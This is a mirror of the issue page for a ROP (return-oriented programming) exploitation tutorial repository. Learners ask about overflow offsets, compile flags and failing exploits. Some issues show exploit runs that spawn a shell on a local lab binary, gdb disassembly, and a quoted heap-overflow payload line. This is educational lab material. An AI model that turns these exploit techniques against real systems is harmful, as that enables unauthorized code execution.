zhengmin1989 / rop_step_by_step Goto Github PK
View Code? Open in Web Editor NEW一步一步学ROP
rop_step_by_step's People
Contributors
Stargazers
Watchers
Forkers
madtrapper icesword-syy kissthink akpotter lexus300h harite handlemail zhanglang001 453483289 qiyeboy riverhac thurday flyboy9 yanchl1989 alvinmap gqfjob x86labs omiao tomagoyaky adisonwu jokerni difcareer gttiankai viewer010 answerrrrrrrrr struce2 nightoftwelve bobbyzhu fpcsong chriiis zhuhp terry2012 peterdocter bluepeople1 garylk apcwowo jinyu00 bingtanguan jingqiangliu syxoasis gitcollect hacker-one zdone g5t4r zysyyz guaxing daydayup1957 superfish9 guiguzi1110 blackswartz lesiah 7ornado jijicanyu xceasar fatenocaster backtrackcroot tombao2007 yi6ei2ifd nealscarffery blankaiwang chonghw 844792418 comahax 0xr0ot pcanyi kakakacool blueroutecn bitefoo wangshu88 stayliv3 sidalei qingkunm learninovationnature lllaaa jacobwk hhhhu8045759 kb1ns youfulife ossecfile houcy missxq131 fpg100 mikalv garithe lanjianchun voukpaw yangronghai libbyangel alberthchang xianghaohyman bahaihe whb224117 chojh03 conanjun altune miragetank lwyeluo narutogit starlookup snyiu100rop_step_by_step's Issues
使用pattern.py进行fuzz时地址出错
蒸米师傅我在用pattern生成的150字节数据填充gdb附加的level1的时候,返回信息如下:
(gdb) run
Starting program: /root/test1
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
Program received signal SIGSEGV, Segmentation fault.
0x00005555555546aa in vulnerable_function ()
(gdb)
这里的地址0x00005555555546aa格式为什么是这样,是哪里出了问题还是编译的时候ASLR关闭失败了?
pattern.py 溢出点如何计算
刚入门二进制学习,想请问一下pattern.py 是如何只通过栈顶地址来计算溢出点的
文章有个配图贴错了。
What are options to compile these binaries?
Hello, thank you for sharing these examples.
I'm just curious, how did you compile binaries for the linux_x64?
I am able to successfully exploit the binary that comes with the repository as shown below:
~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » python3 exp5.py
[*] '/home/Downloads/ROP_STEP_BY_STEP/linux_x64/level3'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './level3': pid 74600
[*] Switching to interactive mode
Hello, World
$ pwd
/home/Downloads/ROP_STEP_BY_STEP/linux_x64
$ exit
[*] Got EOF while reading in interactive
$
[*] Process './level3' stopped with exit code -11 (SIGSEGV) (pid 74600)
[*] Got EOF while sending in interactive
However, if I try to compile the binary by myself such as using the option shown below:
gcc level3.c -o level3_custom -fno-stack-protector -no-pie
Then it won't work:
~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » python3 exp5.py
[*] '/home/Downloads/ROP_STEP_BY_STEP/linux_x64/level3_custom'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './level3_custom': pid 75948
[*] Switching to interactive mode
Hello, World
[*] Got EOF while reading in interactive
$ whoami
[*] Process './level3_custom' stopped with exit code -11 (SIGSEGV) (pid 75948)
[*] Got EOF while sending in interactive
I have made sure to adjust the exp5.py by using gdb to figure out what is the system@plt address with 0x401040:
~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » gdb ./level3_custom
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
...
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./level3_custom...(no debugging symbols found)...done.
>>> disas callsystem
Dump of assembler code for function callsystem:
0x0000000000401142 <+0>: push %rbp
0x0000000000401143 <+1>: mov %rsp,%rbp
0x0000000000401146 <+4>: lea 0xeb7(%rip),%rdi # 0x402004
0x000000000040114d <+11>: callq 0x401040 <system@plt>
...
Thank you in advance.
文章地址已经失效
虽然说大大的文章都有备份,但是这个失效的链接有空记得修复下hhh
111
free note 32bit问题
payload += p32(0) + p32(notelen+0x9)+ "B" * (notelen-0x10)
payload最后-0x10的原因是什么
ROP(x64)-exp4.py使用vulfun_addr无法成功,使用main地址则可以
一步一步学ROP之linux_x64篇的第一节“ Memory Leak & DynELF - 在不获取目标libc.so的情况下进行ROP攻击”。测试的时候,发现exp4.py使用vulfun_addr无法成功,使用main地址则可以成功。环境是Ubuntu 16.04.1 64位系统。使用vulfun_addr时,GDB调试发现system函数执行没有效果,返回值为0x7f00 (32512),然后继续执行vulfun,最后执行.bss,然后收到SIGSEG信号。
这个地方非常困惑。从栈内容上看,一切都符合预期,为什么vulfun_addr就无法成功?为什么用main就可以了,用vulfun怎样才可以成功,有什么诀窍?
希望能解答一下小白的疑惑,谢谢!
android 5.1.1上callsystem函数地址问题
Hi,您好!我在android5.1.1上用arm32/exp/level6.py exploit时出现了一点问题。arm32/exp/level6.py中callsystem函数的地址取的是其在文件中的偏移,在android5.1.1上运行时会出错,callsystemaddr还必须加上level6在内存中的基址才是callsystem在内存中的实际地址,这样修改后才成功exploit。
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.